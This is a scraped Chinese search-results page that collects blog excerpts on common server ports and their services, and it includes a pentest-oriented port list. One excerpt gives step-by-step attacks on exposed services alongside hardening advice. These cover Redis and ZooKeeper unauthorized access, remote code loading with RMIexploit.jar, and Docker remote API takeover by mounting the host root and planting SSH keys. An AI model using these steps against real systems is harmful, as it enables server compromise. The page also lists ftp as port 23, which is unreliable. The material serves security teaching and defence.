精华内容
下载资源
问答
  • 常见服务器端口

    千次阅读 2018-07-20 14:08:20
    理解IP和端口 IP地址是一个规定,现在使用的是IPv4,既由4个0-255之间的数字组成,在计算机内部存储时只需要4个字节即可。在计算机中,IP地址是分配给网卡的,每个网卡有一个唯一的IP地址,如果一个计算机有多个网卡...

    理解IP和端口
    IP地址是一个规定,现在使用的是IPv4,既由4个0-255之间的数字组成,在计算机内部存储时只需要4个字节即可。在计算机中,IP地址是分配给网卡的,每个网卡有一个唯一的IP地址,如果一个计算机有多个网卡,则该台计算机则拥有多个不同的IP地址,在同一个网络内部,IP地址不能相同。IP地址的概念类似于电话号码、身份证这样的概念。由于IP地址不方便记忆,所以有专门创造了域名(Domain Name)的概念,其实就是给IP取一个字符的名字,例如163.com、sina.com等。IP和域名之间存在一定的对应关系。如果把IP地址类比成身份证号的话,那么域名就是你的姓名。 

    一台拥有IP地址的主机可以提供许多服务,比如Web服务、FTP服务、SMTP服务等,这些服务完全可以通过1个IP地址来实现。那么,主机是怎样区分不同的网络服务呢?显然不能只靠IP地址,因为IP 地址与网络服务的关系是一对多的关系。实际上是通过“IP地址+端口号”来区分不同的服务的。        

    其实在网络中只能使用IP地址进行数据传输,所以在传输以前,需要把域名转换为IP,这个由称作DNS的服务器专门来完成。 所以在网络编程中,可以使用IP或域名来标识网络上的一台设备。      为了在一台设备上可以运行多个程序,人为的设计了端口(Port)的概念,类似的例子是公司内部的分机号码。规定一个设备有216个,也就是65536个端口,每个端口对应一个唯一的程序。每个网络程序,无论是客户端还是服务器端,都对应一个或多个特定的端口号。由于0-1024之间多被操作系统占用,所以实际编程时一般采用1024以后的端口号。 下面是一些常见的服务对应的端口:

    ftp:23,telnet:23,smtp:25,dns:53,http:80,https:443

    使用端口号,可以找到一台设备上唯一的一个程序。  所以如果需要和某台计算机建立连接的话,只需要知道IP地址或域名即可,但是如果想和该台计算机上的某个程序交换数据的话,还必须知道该程序使用的端口号。

     

    数据传输方式 在网络上,不管是有线传输还是无线传输,数据传输的方式有两种:

    TCP(Transfer Control Protocol) 传输控制协议方式,该传输方式是一种稳定可靠的传送方式,类似于显示中的打电话。只需要建立一次连接,就可以多次传输数据。就像电话只需要拨一次号,就可以实现一直通话一样,如果你说的话不清楚,对方会要求你重复,保证传输的数据可靠。 使用该种方式的优点是稳定可靠,缺点是建立连接和维持连接的代价高,传输速度不快。

    UDP(User Datagram Protocol) 用户数据报协议方式,该传输方式不建立稳定的连接,类似于发短信息。每次发送数据都直接发送。发送多条短信,就需要多次输入对方的号码。该传输方式不可靠,数据有可能收不到,系统只保证尽力发送。 使用该种方式的优点是开销小,传输速度快,缺点是数据有可能会丢失。          在实际的网络编程中,大家可以根据需要选择任何一种传输方式,或组合使用这两种方式实现数据的传递。

    展开全文
  • 教程名称:常见服务器端口渗透剖析视频教程课程目录:【】1521、3306端口渗透剖析【】23端口渗透剖析【】4899端口渗透剖析【】53端口渗透剖析【】5631、5900端口渗透剖析 资源太大,传百度网盘了,链接在附件中,有...
  • 常见服务端口收集

    千次阅读 2018-10-09 17:42:03
    在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口 第三方通用组件漏洞struts thinkphp jboss ganglia zabbix  80 web 80-89 web 8000-9090 web 2,数据库类(扫描弱口令) 1433 ...

    (转自)http://www.cnblogs.com/Zfc-Cjk/p/8460161.html

    在渗透中端口扫描的收集主机那些那些服务很重要,这里收集到一些常见的的服务端口

    第三方通用组件漏洞struts thinkphp jboss ganglia zabbix 

    80 web

    80-89 web

    8000-9090 web

    2,数据库类(扫描弱口令)

    1433 MSSQL

    1521 Oracle

    3306 MySQL

    5432 PostgreSQL

    3,特殊服务类(未授权/命令执行类/漏洞)

    443 SSL心脏滴血

    873 Rsync未授权

    5984 CouchDB http://xxx:5984/_utils/

    6379 redis未授权

    7001,7002 WebLogic默认弱口令,反序列

    9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞

    11211 memcache未授权访问

    27017,27018 Mongodb未授权访问

    50000 SAP命令执行

    50070,50030 hadoop默认端口未授权访问

    4,常用端口类(扫描弱口令/端口爆破)

    21 ftp

    22 SSH

    23 Telnet

    2601,2604 zebra路由,默认密码zebra

    3389 远程桌面

    端口合计详情

    21 ftp

    22 SSH

    23 Telnet

    80 web

    80-89 web

    161 SNMP

    389 LDAP

    443 SSL心脏滴血以及一些web漏洞测试

    445 SMB

    512,513,514 Rexec

    873 Rsync未授权

    1025,111 NFS

    1433 MSSQL

    1521 Oracle:(iSqlPlus Port:5560,7778)

    2082/2083 cpanel主机管理系统登陆 (国外用较多)

    2222 DA虚拟主机管理系统登陆 (国外用较多)

    2601,2604 zebra路由,默认密码zebra

    3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了

    3306 MySQL

    3312/3311 kangle主机管理系统登陆

    3389 远程桌面

    4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网

    5432 PostgreSQL

    5900 vnc

    5984 CouchDB http://xxx:5984/_utils/

    6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网

    6379 redis未授权 7001,7002 WebLogic默认弱口令,反序列

    7778 Kloxo主机控制面板登录

    8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上

    8080 tomcat/WDCP主机管理系统,默认弱口令 8080,8089,9090 JBOSS

    8083 Vestacp主机管理系统 (国外用较多)

    8649 ganglia

    8888 amh/LuManager 主机管理系统默认端口

    9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞

    10000 Virtualmin/Webmin 服务器虚拟主机管理系统

    11211 memcache未授权访问

    27017,27018 Mongodb未授权访问

    28017 mongodb统计页面

    50000 SAP命令执行

    50070,50030 hadoop默认端口未授权访问

    展开全文
  • 常见服务端口安全风险总结

    千次阅读 2019-05-13 11:55:00
    前言 在日常安全测试工作中,至少有...(由于篇幅有限,本文只探讨平时在安全测试中所发现的端口服务漏洞) 我们都知道,Web服务一般都是通过端口号来识别的,而端口与服务的关系,就好像端口是闸门钥匙,服...

     

     

    前言

     

     

    在日常安全测试工作中,至少有30%以上的定级为严重和高危的漏洞,都是基于服务端口配置不当所造成的。

    因此,本篇文章主要针对服务端口安全问题展开简单总结,希望能尽量减少在日常开发工作中的严重高危漏洞。(由于篇幅有限,本文只探讨平时在安全测试中所发现的端口服务漏洞)

     

    我们都知道,Web服务一般都是通过端口号来识别的,而端口与服务的关系,就好像端口是闸门钥匙,服务是泄洪水库,当需要泄洪的时候需要用钥匙开启闸门。一旦钥匙保存不当(端口配置不当),那么这把钥匙就有可能被不怀好意的人所利用,所造成的后果往往是很严重的。比如敏感数据被窃取,服务器命令任意执行,服务器权限被非法获取等。下文来讲解具体的某些服务配置不当所造成的漏洞危害,以及如何去正确配置。

     

    服务

     

    Apache/Tomcat/Nginx等中间件(默认端口:80/8080)

     

    1、弱口令(admin/admin,root/root等)

    详解:有些应用开放了中间件的控制台页面,如果存在弱口令,可通过爆破登录控制台,对部署的应用进行任意操作,甚至可以上传恶意脚本getshell。

    加固:以tomcat为例,删除tomcat目录下的ROOT文件;或者打开conf/tomcat-uers.xml,修改类似于<user username="admin" password="admin" roles="admin,manager"/>的用户名密码。

    2、版本信息泄露

    详解:当访问应用不存在的页面时,会返回中间件默认设置的404页面,该页面会泄露相关版本信息。某些版本的中间件含有特定漏洞 ,如果攻击者知道了版本信息,可能会针对该版本来进行攻击,因此需要我们自定义错误页面。

     

     

    加固:在web.xml文件的<error-page>设置中,重定向到自定义的错误页面。

     

    WebLogic(默认端口7001)

     

    1、java反序列化

    详解:Java反序列化即,由字节流还原成对象。ObjectInputStream类的readObject()方法用于反序列化。因此要利用Java反序列化漏洞,需要在进行反序列化的地方传入攻击者的序列化代码。Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.0和12.2.1.1版本存在反序列化远程命令执行漏洞,恶意人员可以通过构造恶意请求报文远程执行命令。

    利用:同样的java反序列化漏洞,也存在于Jboss、Websphere、Jenkins容器中。可利用java反序列化测试工具进行测试。

     

     

    加固:升级weblogic官方补丁包;或者删除特定文件,删除commons-collections.jar包内org/apache/commons/collections/functors/InvokerTransformer.class文件,要用压缩工具软件打开后直接删除。

     

    2、Weblogic服务端请求伪造漏洞(SSRF)

    详解:WebLogic 服务器的 UDDI 功能通常很隐蔽,但外部可以访问,Oracle的 WebLogic web服务器通常(a)外部可访问;(b)被允许调用对内部主机的连接。 SearchPublicRegistries.jsp 页面可被未认证的攻击者滥用,造成 WebLogic 服务器连接任意主机的任意端口。其返回信息非常详细,可被攻击者用来推断在指定端口是否有相关服务在监听。

    利用:通过访问http://**.**.**.**/uddiexplorer/SearchPublicRegistries.jsp,点击search,拦截请求包,将operator参数改为想要探测的主机,通过响应信息科判断主机是否被监听,可探测内网。

     

     

    加固:如果业务不需要UDDI功能,就关闭这个功能。可以删除uddiexporer文件夹,可以可在/weblogicPath/server/lib/uddiexplorer.war解压后,注释掉上面的jsp再打包。

     

    Redis数据库(默认端口6379)

     

    1、Redis未授权访问

    详解:redis是一个开源的使用c语言写的,支持网络、可基于内存亦可持久化的日志型、key-value数据库。Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flushall来清空所有数据。如果Redis以root身份运行,可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

    利用:用redis-cli客户端尝试未授权访问,redis-cli -h ip。可获取redis数据库中敏感信息,还可以写入SSH公钥文件来登录受害服务器,从而获取服务器权限。

     

     

    加固:为Redis 添加密码验证(重启redis才能生效):修改 redis.conf 文件,添加requirepass mypassword(注意redis不要用-a参数,明文输入密码,连接后使用auth证);或者禁止一些高危命令(重启redis才能生效)修改 redis.conf 文件,禁用远程修改 DB 文件地址:

    rename-command FLUSHALL ""

    rename-command CONFIG ""

    rename-command EVAL ""

     

    Zookeeper服务(默认端口2181)

     

    1、未授权访问

    详解:分布式的,开放源码的分布式应用程序协调服务。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。

    利用:执行以下命令即可远程获取该服务器的环境:echo envi | nc ip port

    直接连接:./zkCli.sh -server ip:port

    加固: 1、禁止把Zookeeper直接暴露在公网2、添加访问控制,根据情况选择对应方式(认证用户,用户名密码)3、绑定指定IP访问

    Memcache服务(默认端口11211)

    1、未授权访问

    详解:Memcache是一套常用的key-value缓存系统,由于它本身没有权限控制模块,所以对公网开放的Memcache服务很容易被攻击者扫描发现,攻击者通过命令交互可直接读取Memcached中的敏感信息。

    利用:1、登录机器执行netstat -an |more命令查看端口监听情况。回显0.0.0.0:11211表示在所有网卡进行监听,存在memcached未授权访问漏洞。2、telnet <target> 11211,或nc -vv <target> 11211,提示连接成功表示漏洞存在。

    加固:1、设置memchached只允许本地访问2、禁止外网访问Memcached 11211端口3、编译时加上–enable-sasl,启用SASL认证

    RMI服务(默认端口1090、1099)

    1、远程命令执行

    详解:Java RMI服务是远程方法调用。它是一种机制,能够让在某个java虚拟机上的对象调用另一个Java虚拟机的对象的方法。1099端口原本对应的服务为 Apache ActiveMQ 对 JMX 的支持,但是由于配置不当,导致攻击者可以通过此端口利用 javax.management.loading.MLet的getMBeansFromURL 方法来加载一个远端恶意的 MBean ,即可以远程执行任意代码。当然,这个 JMX 的利用方法不仅仅在 ActiveMQ 上能够利用,在很多服务支持 JMX 的情况下其实也能够适用。

    利用:利用攻击测试文件RMIexploit.jar(可从网上下载),其中的ErrorBaseExec.jar是一个自定义的可以执行回显的jar文件,将它放置到VPS上使得其可以通过http访问。命令行下执行java -jar RMIexploit.jar 目标ip 端口 http://自己ip:端口/ErroBaseExec.jar "命令"

    Docker Remote API(默认端口2375)

    1、Docker未授权访问

    详解:Docker Remote API是一个取代远程命令行界面(rcli)的REST API。通过 docker client 或者 http 直接请求就可以访问这个 API,通过这个接口,我们可以新建 container,删除已有 container,甚至是获取宿主机的 shell。

    利用:通过访问http://ip/images/json可以获取到所有的 images 列表

    http://host:2375/containers/json会返回服务器当前运行的 container列表,和在docker CLI上执行 docker ps 的效果一样,过Post包我们还可以新建、开启和关闭容器,其他操作比如拉取image等操作也都可以通过API调用完成。

    Docker remote Api未授权访问的攻击原理与之前的Redis未授权访问漏洞大同小异,都是通过向运行该应用的服务器写文件,从而拿到服务器的权限,常见的利用方法如下:

    (1)远程对被攻击的主机的docker容器进行操作:docker -H tcp://remoteip:2375 images

    (2)启动一个容器并将宿主机根目录挂在到容器的mnt目录:docker -H tcp://remoteip:2375 run -it -v /:/mnt imageId /bin/bash

    (3)在本地主机生成公钥文件:ssh-keygen

    (4)在容器上的root目录中,mkdir .ssh 创建ssh目录;touch authorized_keys 创建文件

    (5)将主机中的rsa.pub里的公钥写入容器中的authorized_keys文件里

    (6)ssh root@ip 免密码登录宿主主机

    加固:1、在不必需的情况下,不要启用docker的remote api服务,如果必须使用的话,可以采用如下的加固方式:设置ACL,仅允许信任的来源IP连接;设置TLS认证,官方的文档为Protect the Docker daemon socket

    1、 客户端连接时需要设置以下环境变量export DOCKER_TLS_VERIFY=1

    export DOCKER_CERT_PATH=~/.docker
    export DOCKER_HOST=tcp://10.10.10.10:2375
    export DOCKER_API_VERSION=1.12

    3、在 docker api 服务器前面加一个代理,例如 nginx,设置 401 认证

     

    结束语

    以上关于服务端口的漏洞,都是基于平时对公司产品进行安全测试时所发现的。在WEB应用中,能获取服务器权限或getshell的漏洞,很多都是由于开发人员疏忽了对服务端口的安全配置造成的。其实,只要做好对服务端口的正确配置和加固,就能避免相当一部分高中危甚至是严重的漏洞。

     

    转载于:https://www.cnblogs.com/yc-shen/p/10855866.html

    展开全文
  • 服务器常见默认端口

    2020-03-05 11:07:32
    TCP 80 HTTP默认端口,对外公共服务端口; TCP 443 安全型HTTPS默认端口,对外公共服务端口;...TCP/UDP 53 对外DNS服务时的端口,域名解析时使用UDP协议; TCP 25 非加密型SMTP默认端口,对外发邮件; TCP 1...

    TCP 80 HTTP默认端口,对外公共服务端口;

    TCP 443 安全型HTTPS默认端口,对外公共服务端口;

    TCP 21 FTP服务器端口,用于文件传输;

    TCP 22 SSH远程连接端口,安全登录型;

    TCP 23 Telnet端口,不安全的文本传送;

    TCP/UDP 53 对外DNS服务时的端口,域名解析时使用UDP协议;

    TCP 25 非加密型SMTP默认端口,对外发邮件;

    TCP 110 非加密型POP3默认端口,供外部收取邮件;

    TCP 161 SNMP协议默认端口,开放此端口方能供程序通过SNMP方式自动管理设备;

    TCP 3389 Windows服务器默认远程桌面连接端口;

    TCP 1433 SQL Server数据库默认端口;

    TCP 3306 MySQL数据库默认端口;

    TCP 135,137,138,139 局域网相关默认端口,应关闭。

    展开全文
  • 常见服务端口

    万次阅读 2021-07-30 15:20:39
    邮件服务 53 DNS 域名系统 67 DHCP 1433 MSSQL SQL server数据库 1521 Oracle Oracle数据库 2181 zookeeper 分布式服务框架 3306 MySQL MySQL数据库 6379 ...
  • 常见邮箱服务器端口

    万次阅读 2018-12-06 18:06:32
    POP3服务器地址:pop.gmail.com(SSL启用 端口:995) SMTP服务器地址:smtp.gmail.com(SSL启用 端口:587) 21cn.com: POP3服务器地址:pop.21cn.com(端口:110) SMTP服务器地址:smtp.21cn.com(端口:25) sina....
  • 常见端口服务

    千次阅读 2020-12-02 08:01:16
    最近的一次面试题考了这个问题,发现从来没具体记过常见服务,所以就模模糊糊的写了些,所以记录一下 HTTP:80 FTP:21 SSH:22 Telnet:23 SMTP:25 HTTPS:443 IMAP:993 Socks:1080 Sql server:1433 Oracle:1521 ...
  • 20:FTP服务的数据传输端口 21:FTP服务的连接端口,可能存在 弱口令暴力破解 22:SSH服务端口,可能存在 弱口令暴力破解 ...80:HTTP端口常见web漏洞 88:Kerberos协议端口 110:POP3邮件服务端口,和SMTP的25端口
  • 主流操作系统常见端口服务的对应及解释。 包括windows、AIX、HP-UX、Linux等
  • 代理服务器常用以下端口: ⑴. HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080 ⑵. SOCKS代理协议服务器常用端口号:1080 ⑶. FTP(文件传输)协议代理服务器常用端口号:21 ⑷. Telnet(远程登录)协议代理...
  • Linux中常见服务对应的端口

    千次阅读 2021-03-18 08:31:17
    Linux中常见服务对应的端口号一、常见服务对应的端口端口:0端口:1端口:7端口:19端口:20(数据端口) 21(控制端口端口:22端口:23端口:25端口:42端口:53端口:67端口:80端口:88端口:110端口:113端口...
  • 网络常见端口-服务对应表,包含大多数的端口说明,能够根据这些端口说明指定适当的端口策略,增加安全性。
  • 常见服务的默认端口

    千次阅读 2018-10-12 09:34:24
    HTTP:超文本传输协议,默认端口80 FTP:文件传送协议,默认端口21 TELNET:远程终端协议,默认端口23 SMTP:简单邮件传送协议,默认端口25 Windows终端服务:默认端口3389...
  • 常见危险端口详细列表以及如何关闭这些网络端口
  • 常见端口号对应服务

    千次阅读 2020-05-19 14:34:34
    23端口主要用于Telnet(远程登录)服务,是Internet上普遍采用的登录和仿真程序。 25 25端口为SMTP(Simple Mail Transfer Protocol,简单邮件传输协议)服务器所开放,主要用于发送邮件,如今绝大多数邮件服务器...
  • 常见端口服务渗透

    千次阅读 2017-05-28 00:17:23
    21 ftp 匿名访问 站库分离进行...22 ssh 端口转发 代理 25 smtp 伪造源地址漏洞 110 POP3 135 RPC  139 445 139 445都是为了共享而开 873 rsyns 利用弱口令下载文件 1433 sqlserver 数据库 
  • 常见端口漏洞

    千次阅读 2018-07-17 16:13:02
    互联网中的各种服务一般都对应一个默认端口...端口对应的服务以及漏洞存在方式—-常见端口漏洞 21 FTP 匿名访问,弱口令 22 SSH 弱口令登录 23 Telnet 弱口令登录 80 Web 常见Web漏洞或后台登录弱口令 161 SNMP ...
  • 常见路由器端口映射图解 , 一般企业网络结构 , Adsl modem 的设置
  • 常见端口列表

    2014-12-18 14:46:30
    常见端口号汇总
  • 常见网络端口 计算机上的物理端口允许与外围设备(如键盘和鼠标)进行通信,并可以通过以太网电缆与Internet设备连接。 Linux终端 适用于Linux的7大终端模拟器 用于Linux中数据分析的10个命令行工具 立即...
  • Web服务器的常见端口

    千次阅读 2015-09-20 00:38:59
    访问时候,URL地址隐含了默认的端口80。如果不是80,则必须在URL中添加端口号。很多协议都有默认的端口号,如FTP为21,SMTP为25。 (2)139 由“NetBIOS Session Service”提供,主要用于提供Windows文件和...
  • 常见端口渗透笔录

    万次阅读 2020-07-14 00:10:00
    今天分享一些常见端口服务及漏洞利用,帮助你快速找到获取主机权限的攻击路径。 1、远程管理端口 22 端口(SSH) 安全攻击:弱口令、暴力猜解、用户名枚举利用方式:1、通过用户名枚举可以判断某个用户名是否存在...
  • 常见udp服务及其端口

    千次阅读 2020-07-21 19:45:27
    服务 端口号 dns 53 tftp 69 ntp 123 snmp 161 nfs 2049
  • 常见的默认端口

    千次阅读 2019-06-27 09:06:36
    常见的默认端口 常见端口及其用途如下: 21端口:FTP文件传输服务 22端口:SSH远程连接服务 23端口:TELNET终端仿真服务 25端口:SMTP简单邮件传输服务 53端口:DNS域名解析服务 80端口:HTTP超文本传输服务 443...
  • 常见网络端口常见网络协议

    千次阅读 2014-05-07 22:50:22
    常见网络端口 端口:0  服务:Reserved  说明:通常用于分析操作系统。 端口:1  服务:tcpmux  说明:这显示有人在寻找SGI Irix机器。 端口:7  服务:Echo  说明:能看到许多人搜索...
  • HTTP常见端口

    千次阅读 2019-08-23 10:09:34
    常见端口地点 HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口); HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp; Telnet(不安全的文本传送),默认端口号为23/tcp...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 298,358
精华内容 119,343
关键字:

常见服务端口